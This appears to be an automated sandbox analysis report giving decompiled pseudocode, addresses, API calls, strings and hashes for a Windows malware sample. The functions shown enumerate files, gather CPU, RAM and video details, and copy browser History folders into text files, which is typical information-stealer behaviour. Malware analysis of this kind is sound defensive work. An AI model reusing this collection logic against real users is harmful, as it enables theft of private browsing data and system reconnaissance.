											E00403D2C( &_v792,  *((intOrPtr*)(_v52 + _t575 * 4)));
											E0040781C(_v792, _t460,  &_v788, __eflags);
											E0040377C( &_v784, _v788);
											E00406318(_v784, _t460,  &_v780, _t573, _t575);
											_pop(_t534);
											_t377 = E00403A78(_v780, _t534);
											__eflags = _t377;
											if(_t377 != 0) {
												_v53 = 1;
											}
											_t575 = _t575 + 1;
											_t460 = _t460 - 1;
											__eflags = _t460;
										} while (__eflags != 0);
										goto L41;
									}
									E0040377C( &_v712, _v36);
									E00406318(_v712, _t458,  &_v708, _t573, _t574);
									_t383 = E00403A78(0x414c58, _v708);
									__eflags = _t383;
									if(_t383 == 0) {
										goto L30;
									}
									E004141B8(_v32, _t458,  &_v40, _t574);
									_t387 = E004068EC(_v40);
									__eflags = _t387 - _a16;
									if(_t387 > _a16) {
										goto L30;
									}
									_t458 = E004045EC(_v44) - 1;
									__eflags = _t458;
									if(_t458 < 0) {
										goto L30;
									}
									_t458 = _t458 + 1;
									_t574 = 0;
									__eflags = 0;
									while(1) {
										E0040770C(_v40, _t458, _t474,  &_v720, _t574, __eflags);
										E0040377C( &_v716, _v720);
										_t474 = 0;
										__eflags = E00406120(_v716, _t458, 0,  *((intOrPtr*)(_v44 + _t574 * 4)), _t573, _t574);
										if(__eflags != 0) {
											break;
										}
										_t574 = _t574 + 1;
										_t458 = _t458 - 1;
										__eflags = _t458;
										if(__eflags != 0) {
											continue;
										}
										goto L30;
									}
									E0040781C(_v32, _t458,  &_v724, __eflags);
									E00403BE0( &_v32, _v724);
									E0040781C(_v8, _t458,  &_v728, __eflags);
									E00403BE0( &_v8, _v728);
									E0040781C(_v40, _t458,  &_v732, __eflags);
									E00403BE0( &_v40, _v732);
									_push(_v32);
									_push("._.");
									E0040770C(_v40, _t458, 0,  &_v736, _t574, __eflags);
									_push(_v736);
									E00403E1C();
									E00403F34( &_v48, E00403D4C(_v8), 1, __eflags);
									_push(_v16);
									_push(0x414c4c);
									_push(_v48);
									E00403E1C();
									E0040781C(_v748, _t458,  &_v744, __eflags);
									E0040377C( &_v740, _v744);
									_push(_v740);
									E0040781C(_v40, _t458,  &_v752, __eflags);
									_pop(_t556);
									E0040DDB0(_v752, _t458, _t556, _t573, _t574);
									_v20 = _v20 + 1;
									__eflags = _a4 - 1;
									if(_a4 == 1) {
										_t425 =  *0x41b638; // 0x41b0ac
										 *_t425 =  *_t425 + 1;
									}
									goto L30;
								}
								__eflags = _v648.nFileSizeHigh;
								if(_v648.nFileSizeHigh != 0) {
									goto L21;
								}
								_push(0);
								_push(_v648.nFileSizeLow >> 0xa);
								_t428 = _a16;
								asm("cdq");
								__eflags = 0 - _v56;
								if(__eflags != 0) {
									if(__eflags < 0) {
										goto L21;
									}
									L15:
									_t458 = E004045EC(_v44) - 1;
									__eflags = _t458;
									if(_t458 < 0) {
										goto L21;
									}
									_t458 = _t458 + 1;
									_t574 = 0;
									__eflags = 0;
									while(1) {
										E0040377C( &_v684, _v36);
										_t474 = 0;
										__eflags = E00406120(_v684, _t458, 0,  *((intOrPtr*)(_v44 + _t574 * 4)), _t573, _t574);
										if(__eflags != 0) {
											break;
										}
										_t574 = _t574 + 1;
										_t458 = _t458 - 1;
										__eflags = _t458;
										if(_t458 != 0) {
											continue;
										}
										goto L21;
									}
									E0040781C(_v8, _t458,  &_v688, __eflags);
									E00403BE0( &_v8, _v688);
									E0040781C(_v32, _t458,  &_v48, __eflags);
									_t474 = E00403D4C(_v8);
									E00403F34( &_v48, _t443, 1, __eflags);
									_push(_v16);
									_push(0x414c4c);
									_push(_v48);
									E00403E1C();
									E0040781C(_v700, _t458,  &_v696, __eflags);
									E0040377C( &_v692, _v696);
									_push(_v692);
									E0040781C(_v32, _t458,  &_v704, __eflags);
									_pop(_t570);
									E0040DDB0(_v704, _t458, _t570, _t573, _t574);
									_v20 = _v20 + 1;
									__eflags = _a4 - 1;
									if(_a4 == 1) {
										_t456 =  *0x41b638; // 0x41b0ac
										 *_t456 =  *_t456 + 1;
									}
									goto L21;
								}
								__eflags = _t428 -  *_t579;
								if(_t428 <  *_t579) {
									goto L21;
								}
								goto L15;
								L43:
								_t333 = FindNextFileW(_t573,  &_v648);
								__eflags = _t333;
							} while (_t333 != 0);
							FindClose(_t573);
							continue;
						}
						__eflags = _t301 -  *_t471;
						if(_t301 >  *_t471) {
							goto L8;
						} else {
							goto L46;
						}
					}
					goto L46;
				}
			}




















































































                                                                      0x00414408
                                                                      0x00414408
                                                                      0x00414409
                                                                      0x0041440b
                                                                      0x0041440c
                                                                      0x00414411
                                                                      0x00414411
                                                                      0x00414413
                                                                      0x00414415
                                                                      0x00414415
                                                                      0x00414415
                                                                      0x00414418
                                                                      0x00414418
                                                                      0x0041441b
                                                                      0x0041441c
                                                                      0x0041441d
                                                                      0x0041441e
                                                                      0x00414421
                                                                      0x00414424
                                                                      0x0041442a
                                                                      0x00414432
                                                                      0x0041443a
                                                                      0x00414442
                                                                      0x00414449
                                                                      0x0041444a
                                                                      0x0041444f
                                                                      0x00414452
                                                                      0x00414457
                                                                      0x00414463
                                                                      0x00414471
                                                                      0x0041447f
                                                                      0x00414492
                                                                      0x004144a0
                                                                      0x004144b3
                                                                      0x004144bb
                                                                      0x004144c0
                                                                      0x004144c2
                                                                      0x00414ad9
                                                                      0x00414adb
                                                                      0x00414ade
                                                                      0x00414ae1
                                                                      0x00414af1
                                                                      0x00414b01
                                                                      0x00414b0c
                                                                      0x00414b1c
                                                                      0x00414b2c
                                                                      0x00414b37
                                                                      0x00414b47
                                                                      0x00414b57
                                                                      0x00414b67
                                                                      0x00414b72
                                                                      0x00414b7d
                                                                      0x00414b88
                                                                      0x00414b98
                                                                      0x00414ba8
                                                                      0x00414bb3
                                                                      0x00414bbb
                                                                      0x00414bc1
                                                                      0x00414bc9
                                                                      0x00414bd1
                                                                      0x00414bd7
                                                                      0x00414be4
                                                                      0x00414bec
                                                                      0x00414bf2
                                                                      0x00414bff
                                                                      0x00414c04
                                                                      0x00414c0c
                                                                      0x004144c8
                                                                      0x004144d1
                                                                      0x004144e0
                                                                      0x004144e5
                                                                      0x004144f7
                                                                      0x00414501
                                                                      0x0041450c
                                                                      0x0041450d
                                                                      0x00414ac9
                                                                      0x00414517
                                                                      0x0041451c
                                                                      0x00414521
                                                                      0x00414526
                                                                      0x00414529
                                                                      0x0041452f
                                                                      0x0041452f
                                                                      0x00414532
                                                                      0x0041453d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00414543
                                                                      0x00414555
                                                                      0x00414569
                                                                      0x00414576
                                                                      0x00414576
                                                                      0x00414577
                                                                      0x00414586
                                                                      0x0041458b
                                                                      0x004145a3
                                                                      0x004145b4
                                                                      0x004145ca
                                                                      0x004145cc
                                                                      0x004145cc
                                                                      0x004145cf
                                                                      0x004145e0
                                                                      0x004145e5
                                                                      0x004145ea
                                                                      0x004145fb
                                                                      0x00414609
                                                                      0x00414614
                                                                      0x00414622
                                                                      0x00414625
                                                                      0x00414759
                                                                      0x00414759
                                                                      0x0041475d
                                                                      0x00414912
                                                                      0x00414912
                                                                      0x00414916
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041492d
                                                                      0x0041493d
                                                                      0x00414942
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00414959
                                                                      0x00414969
                                                                      0x0041496e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00414974
                                                                      0x0041497f
                                                                      0x00414982
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041498d
                                                                      0x00414992
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004149a1
                                                                      0x004149b2
                                                                      0x004149b7
                                                                      0x004149ba
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004149c0
                                                                      0x004149ce
                                                                      0x004149cf
                                                                      0x004149d1
                                                                      0x00414a71
                                                                      0x00414a71
                                                                      0x00414a75
                                                                      0x00414a7f
                                                                      0x00414a7f
                                                                      0x00414a80
                                                                      0x00414a8f
                                                                      0x00414a94
                                                                      0x00414aa9
                                                                      0x00414aa9
                                                                      0x00000000
                                                                      0x00414a75
                                                                      0x004149d7
                                                                      0x004149d8
                                                                      0x004149d8
                                                                      0x004149da
                                                                      0x004149e3
                                                                      0x004149f4
                                                                      0x00414a05
                                                                      0x00414a10
                                                                      0x00414a1d
                                                                      0x00414a2e
                                                                      0x00414a3f
                                                                      0x00414a50
                                                                      0x00414a5b
                                                                      0x00414a5c
                                                                      0x00414a61
                                                                      0x00414a63
                                                                      0x00414a65
                                                                      0x00414a65
                                                                      0x00414a69
                                                                      0x00414a6a
                                                                      0x00414a6a
                                                                      0x00414a6a
                                                                      0x00000000
                                                                      0x004149da
                                                                      0x0041476c
                                                                      0x0041477d
                                                                      0x0041478d
                                                                      0x00414792
                                                                      0x00414794
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004147a0
                                                                      0x004147a8
                                                                      0x004147ad
                                                                      0x004147b0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004147c0
                                                                      0x004147c1
                                                                      0x004147c3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004147c9
                                                                      0x004147ca
                                                                      0x004147ca
                                                                      0x004147cc
                                                                      0x004147d5
                                                                      0x004147e6
                                                                      0x004147f7
                                                                      0x004147fe
                                                                      0x00414800
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041490a
                                                                      0x0041490b
                                                                      0x0041490b
                                                                      0x0041490c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041490c
                                                                      0x0041480f
                                                                      0x0041481d
                                                                      0x0041482b
                                                                      0x00414839
                                                                      0x00414847
                                                                      0x00414855
                                                                      0x0041485a
                                                                      0x0041485d
                                                                      0x0041486b
                                                                      0x00414870
                                                                      0x0041487e
                                                                      0x00414895
                                                                      0x0041489a
                                                                      0x0041489d
                                                                      0x004148a2
                                                                      0x004148b0
                                                                      0x004148c1
                                                                      0x004148d2
                                                                      0x004148dd
                                                                      0x004148e7
                                                                      0x004148f2
                                                                      0x004148f3
                                                                      0x004148f8
                                                                      0x004148fb
                                                                      0x004148ff
                                                                      0x00414901
                                                                      0x00414906
                                                                      0x00414906
                                                                      0x00000000
                                                                      0x004148ff
                                                                      0x0041462b
                                                                      0x00414632
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00414643
                                                                      0x00414644
                                                                      0x00414645
                                                                      0x00414648
                                                                      0x00414649
                                                                      0x0041464d
                                                                      0x0041465e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00414664
                                                                      0x0041466e
                                                                      0x0041466f
                                                                      0x00414671
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00414677
                                                                      0x00414678
                                                                      0x00414678
                                                                      0x0041467a
                                                                      0x00414683
                                                                      0x00414694
                                                                      0x0041469b
                                                                      0x0041469d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00414751
                                                                      0x00414752
                                                                      0x00414752
                                                                      0x00414753
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00414753
                                                                      0x004146ac
                                                                      0x004146ba
                                                                      0x004146c5
                                                                      0x004146d2
                                                                      0x004146dc
                                                                      0x004146e1
                                                                      0x004146e4
                                                                      0x004146e9
                                                                      0x004146f7
                                                                      0x00414708
                                                                      0x00414719
                                                                      0x00414724
                                                                      0x0041472e
                                                                      0x00414739
                                                                      0x0041473a
                                                                      0x0041473f
                                                                      0x00414742
                                                                      0x00414746
                                                                      0x00414748
                                                                      0x0041474d
                                                                      0x0041474d
                                                                      0x00000000
                                                                      0x00414746
                                                                      0x0041464f
                                                                      0x00414654
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00414aae
                                                                      0x00414ab6
                                                                      0x00414abb
                                                                      0x00414abb
                                                                      0x00414ac4
                                                                      0x00000000
                                                                      0x00414ac4
                                                                      0x00414534
                                                                      0x00414536
                                                                      0x00000000
                                                                      0x00414538
                                                                      0x00000000
                                                                      0x00414538
                                                                      0x00414536
                                                                      0x00000000
                                                                      0x00414ac9

                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?,?,0041A69E), ref: 004145C5
                                                                        • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                        • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeString$FileFindFirst
                                                                      • String ID: .LNK$._.$0_@$LLA$CA
                                                                      • API String ID: 1653790112-882170572
                                                                      • Opcode ID: eabfcec7a1b34a96f3a487c33c476ef2dae85da7546450ac9a0750b76edb40a6
                                                                      • Instruction ID: 9c4ae2fa8e47753b2fad7318643bbdaa039e98a1c6b9804601cb0bccf78cece1
                                                                      • Opcode Fuzzy Hash: eabfcec7a1b34a96f3a487c33c476ef2dae85da7546450ac9a0750b76edb40a6
                                                                      • Instruction Fuzzy Hash: 6A224374A0011E9BCB10EF55C985ADEB7B9EF84308F1081B7E504B7296DB38AF858F59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00416740 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 47%
                                                                      			E00416740(intOrPtr* __eax, void* __ebx, void* __esi) {
				struct _SYSTEM_INFO _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				signed int _t38;
				signed int _t39;
				signed int _t92;
				void* _t93;
				void* _t94;
				intOrPtr _t113;
				void* _t117;
				intOrPtr _t120;
				intOrPtr _t121;

				_t118 = __esi;
				_t38 = __eax +  *__eax;
				 *_t38 =  *_t38 + _t38;
				_t39 = _t38 | 0x5500000a;
				_t120 = _t121;
				_t93 = 0xb;
				do {
					_push(0);
					_push(0);
					_t93 = _t93 - 1;
					_t124 = _t93;
				} while (_t93 != 0);
				_t92 = _t39;
				_push(_t120);
				_push(0x4168d4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t121;
				GetSystemInfo( &_v40);
				E00403D2C( &_v48,  *_t92);
				_push(_v48);
				_push(L"CPU Model: ");
				_push(0);
				_push( &_v52);
				E00406984("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t92,  &_v60, _t117, __esi);
				E00403D2C( &_v56, _v60);
				_push(_v56);
				E00406984("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t92,  &_v68, _t117, __esi);
				E00403D2C( &_v64, _v68);
				_pop(_t94);
				E00407500(0x80000002, _t92, _t94, _v64);
				_push(_v52);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t92, _v44);
				E004037DC( &_v80, "CPU Count: ",  *_t92);
				E00403D2C( &_v76, _v80);
				_push(_v76);
				E00406FDC(_v40.dwNumberOfProcessors, _t92,  &_v84, __esi, _t124);
				_push(_v84);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t92, _v72);
				_push( *_t92);
				_push("GetRAM: ");
				E00416584( &_v88, _t92, _t118, _t124);
				_push(_v88);
				_push(0x4169ac);
				E00403850();
				_push( *_t92);
				_push("Video Info\r\n");
				E00416644( &_v92, _t92, _t117, _t118);
				_push(_v92);
				E00403850();
				_t113 = 0x4169ac;
				 *[fs:eax] = _t113;
				_push(E004168DB);
				E00403508( &_v92, 2);
				E00403B80( &_v84);
				E004034E4( &_v80);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B80( &_v64);
				E004034E4( &_v60);
				return E00403B98( &_v56, 4);
			}


























                                                                      0x00416740
                                                                      0x00416740
                                                                      0x00416742
                                                                      0x00416744
                                                                      0x00416749
                                                                      0x0041674b
                                                                      0x00416750
                                                                      0x00416750
                                                                      0x00416752
                                                                      0x00416754
                                                                      0x00416754
                                                                      0x00416754
                                                                      0x00416758
                                                                      0x0041675c
                                                                      0x0041675d
                                                                      0x00416762
                                                                      0x00416765
                                                                      0x0041676c
                                                                      0x00416776
                                                                      0x0041677b
                                                                      0x0041677e
                                                                      0x00416783
                                                                      0x00416788
                                                                      0x00416791
                                                                      0x0041679c
                                                                      0x004167a4
                                                                      0x004167ad
                                                                      0x004167b8
                                                                      0x004167c5
                                                                      0x004167c6
                                                                      0x004167cb
                                                                      0x004167ce
                                                                      0x004167db
                                                                      0x004167e5
                                                                      0x004167f4
                                                                      0x004167ff
                                                                      0x00416804
                                                                      0x0041680d
                                                                      0x00416812
                                                                      0x00416815
                                                                      0x00416822
                                                                      0x0041682c
                                                                      0x00416831
                                                                      0x00416833
                                                                      0x0041683b
                                                                      0x00416840
                                                                      0x00416843
                                                                      0x0041684f
                                                                      0x00416854
                                                                      0x00416856
                                                                      0x0041685e
                                                                      0x00416863
                                                                      0x00416872
                                                                      0x00416879
                                                                      0x0041687c
                                                                      0x0041687f
                                                                      0x0041688c
                                                                      0x00416894
                                                                      0x0041689c
                                                                      0x004168a9
                                                                      0x004168b1
                                                                      0x004168b9
                                                                      0x004168c1
                                                                      0x004168d3

                                                                      APIs
                                                                      • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                        • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                        • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeString$InfoSystem
                                                                      • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                      • API String ID: 4070941872-1038824218
                                                                      • Opcode ID: 994227d9c169a1dbbd8c134888da1df913b25c71fc93550dee7adeb46b23c78b
                                                                      • Instruction ID: ec5783c0b7ca42e81122729fbed3a1ddf4b85dfc6774dd9c704540b43fb157b1
                                                                      • Opcode Fuzzy Hash: 994227d9c169a1dbbd8c134888da1df913b25c71fc93550dee7adeb46b23c78b
                                                                      • Instruction Fuzzy Hash: 64411270A1010D9BDB01FFD1D882ADDBBB9EF48309F51403BF504B7296D639EA458B59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00412D70 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 159fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 52%
                                                                      			E00412D70(signed int __eax, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v12;
				char _v16;
				void* _v24;
				intOrPtr _v117;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				intOrPtr _v656;
				char _v660;
				signed int _t58;
				void* _t112;
				void* _t114;
				intOrPtr _t116;
				intOrPtr _t131;
				intOrPtr _t136;
				intOrPtr _t148;
				intOrPtr _t149;

				_t146 = __esi;
				_t145 = __edi;
				_pop(_t114);
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__eax + __eax)) =  *((intOrPtr*)(__eax + __eax)) + __eax;
				 *__eax =  *__eax + __eax;
				_pop(_t147);
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__eax + __eax)) =  *((intOrPtr*)(__eax + __eax)) + __eax;
				 *__eax =  *__eax + __eax;
				_t58 = __eax | 0x00000a00;
				 *_t58 =  *_t58 + _t58;
				 *_t58 =  *_t58 + __ecx;
				 *_t58 =  *_t58 + _t58;
				 *0xd000a00 =  *0xd000a00 + __ecx;
				 *((intOrPtr*)(__edx)) =  *((intOrPtr*)(__edx)) + __ecx;
				 *_t58 =  *_t58 + _t58;
				 *_t58 =  *_t58 + _t58;
				_v117 = _v117 + __edx;
				_t148 = _t149;
				_push(__ecx);
				_t116 = 0x51;
				do {
					_push(0);
					_push(0);
					_t116 = _t116 - 1;
				} while (_t116 != 0);
				_push(_t116);
				_t7 =  &_v8;
				 *_t7 = _t116;
				_push(_t114);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t7;
				_v12 = __edx;
				_v8 = _t58;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t148);
				_push(0x412fe0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t149;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x413008);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x413008);
					E0040813C(0x61,  &_v632);
					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t114, 0x104) != 0) {
						_push(_t148);
						_push(0x412f54);
						_push( *[fs:eax]);
						 *[fs:eax] = _t149;
						if(_a4 == 0) {
							_push(_v8);
							_push(0x413008);
							E00403D10( &_v648, 0x104,  &(_v616.cFileName));
							_push(_v648);
							_push(L"\\History");
							E00403E1C();
							E004129A4(_v644, _t114,  &_v640, _t145, _t146);
							E0040377C( &_v636, _v640);
							_push(_v636);
							_push(_v16);
							_push(0x413008);
							_push(_v12);
							_push(0x413028);
							E00403D10( &_v660, 0x104,  &(_v616.cFileName));
							_push(_v660);
							_push(L".txt");
							E00403E1C();
							E0040377C( &_v652, _v656);
							_pop(_t112);
							E0040DCE8(_t112, _t114, _v652, _t145, _t146);
						}
						_pop(_t136);
						 *[fs:eax] = _t136;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t131);
				 *[fs:eax] = _t131;
				_push(E00412FE7);
				E00403B98( &_v660, 2);
				E004034E4( &_v652);
				E00403B98( &_v648, 3);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}




























                                                                      0x00412d70
                                                                      0x00412d70
                                                                      0x00412d70
                                                                      0x00412d71
                                                                      0x00412d73
                                                                      0x00412d76
                                                                      0x00412d78
                                                                      0x00412d79
                                                                      0x00412d7b
                                                                      0x00412d7d
                                                                      0x00412d7f
                                                                      0x00412d82
                                                                      0x00412d84
                                                                      0x00412d89
                                                                      0x00412d8b
                                                                      0x00412d8d
                                                                      0x00412d8f
                                                                      0x00412d95
                                                                      0x00412d97
                                                                      0x00412d99
                                                                      0x00412d9b
                                                                      0x00412d9d
                                                                      0x00412d9f
                                                                      0x00412da0
                                                                      0x00412da5
                                                                      0x00412da5
                                                                      0x00412da7
                                                                      0x00412da9
                                                                      0x00412da9
                                                                      0x00412dac
                                                                      0x00412dad
                                                                      0x00412dad
                                                                      0x00412db0
                                                                      0x00412db1
                                                                      0x00412db2
                                                                      0x00412db3
                                                                      0x00412db6
                                                                      0x00412db9
                                                                      0x00412dbf
                                                                      0x00412dc7
                                                                      0x00412dcf
                                                                      0x00412dd6
                                                                      0x00412dd7
                                                                      0x00412ddc
                                                                      0x00412ddf
                                                                      0x00412df7
                                                                      0x00412e0d
                                                                      0x00412e10
                                                                      0x00412e10
                                                                      0x00412e13
                                                                      0x00412e29
                                                                      0x00412e2e
                                                                      0x00412e34
                                                                      0x00412e44
                                                                      0x00412e49
                                                                      0x00412e5a
                                                                      0x00412e6c
                                                                      0x00412e74
                                                                      0x00412e75
                                                                      0x00412e7a
                                                                      0x00412e7d
                                                                      0x00412e84
                                                                      0x00412e8a
                                                                      0x00412e8d
                                                                      0x00412ea3
                                                                      0x00412ea8
                                                                      0x00412eae
                                                                      0x00412ebe
                                                                      0x00412ecf
                                                                      0x00412ee0
                                                                      0x00412eeb
                                                                      0x00412eec
                                                                      0x00412eef
                                                                      0x00412ef4
                                                                      0x00412ef7
                                                                      0x00412f0d
                                                                      0x00412f12
                                                                      0x00412f18
                                                                      0x00412f28
                                                                      0x00412f39
                                                                      0x00412f44
                                                                      0x00412f45
                                                                      0x00412f45
                                                                      0x00412f4c
                                                                      0x00412f4f
                                                                      0x00412f4f
                                                                      0x00412f6e
                                                                      0x00412f7a
                                                                      0x00412f81
                                                                      0x00412f84
                                                                      0x00412f87
                                                                      0x00412f97
                                                                      0x00412fa2
                                                                      0x00412fb2
                                                                      0x00412fbd
                                                                      0x00412fcd
                                                                      0x00412fdf

                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileFindFirst
                                                                      • String ID: .txt$\*.*$\History
                                                                      • API String ID: 1974802433-2232271174
                                                                      • Opcode ID: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
                                                                      • Instruction ID: 31102d54a49b3a600332046a535115537665bbef1f46384b784085fa532e6d73
                                                                      • Opcode Fuzzy Hash: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
                                                                      • Instruction Fuzzy Hash: 61516C70909259AFCB12EB61CC45BDDBB78EF45304F2041EBA508F7192DA789F898B19
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00412D9C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 141fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 45%
                                                                      			E00412D9C(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				intOrPtr _v656;
				char _v660;
				void* _t105;
				intOrPtr _t109;
				intOrPtr _t124;
				intOrPtr _t129;
				intOrPtr _t141;
				intOrPtr _t142;

				_t139 = __esi;
				_t138 = __edi;
				_t107 = __ebx;
				_t141 = _t142;
				_push(__ecx);
				_t109 = 0x51;
				do {
					_push(0);
					_push(0);
					_t109 = _t109 - 1;
				} while (_t109 != 0);
				_push(_t109);
				_t1 =  &_v8;
				 *_t1 = _t109;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t141);
				_push(0x412fe0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t142;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x413008);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x413008);
					E0040813C(0x61,  &_v632);
					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t107, 0x104) != 0) {
						_push(_t141);
						_push(0x412f54);
						_push( *[fs:eax]);
						 *[fs:eax] = _t142;
						if(_a4 == 0) {
							_push(_v8);
							_push(0x413008);
							E00403D10( &_v648, 0x104,  &(_v616.cFileName));
							_push(_v648);
							_push(L"\\History");
							E00403E1C();
							E004129A4(_v644, _t107,  &_v640, _t138, _t139);
							E0040377C( &_v636, _v640);
							_push(_v636);
							_push(_v16);
							_push(0x413008);
							_push(_v12);
							_push(0x413028);
							E00403D10( &_v660, 0x104,  &(_v616.cFileName));
							_push(_v660);
							_push(L".txt");
							E00403E1C();
							E0040377C( &_v652, _v656);
							_pop(_t105);
							E0040DCE8(_t105, _t107, _v652, _t138, _t139);
						}
						_pop(_t129);
						 *[fs:eax] = _t129;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t124);
				 *[fs:eax] = _t124;
				_push(E00412FE7);
				E00403B98( &_v660, 2);
				E004034E4( &_v652);
				E00403B98( &_v648, 3);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}

























                                                                      0x00412d9c
                                                                      0x00412d9c
                                                                      0x00412d9c
                                                                      0x00412d9d
                                                                      0x00412d9f
                                                                      0x00412da0
                                                                      0x00412da5
                                                                      0x00412da5
                                                                      0x00412da7
                                                                      0x00412da9
                                                                      0x00412da9
                                                                      0x00412dac
                                                                      0x00412dad
                                                                      0x00412dad
                                                                      0x00412db0
                                                                      0x00412db1
                                                                      0x00412db2
                                                                      0x00412db3
                                                                      0x00412db6
                                                                      0x00412db9
                                                                      0x00412dbf
                                                                      0x00412dc7
                                                                      0x00412dcf
                                                                      0x00412dd6
                                                                      0x00412dd7
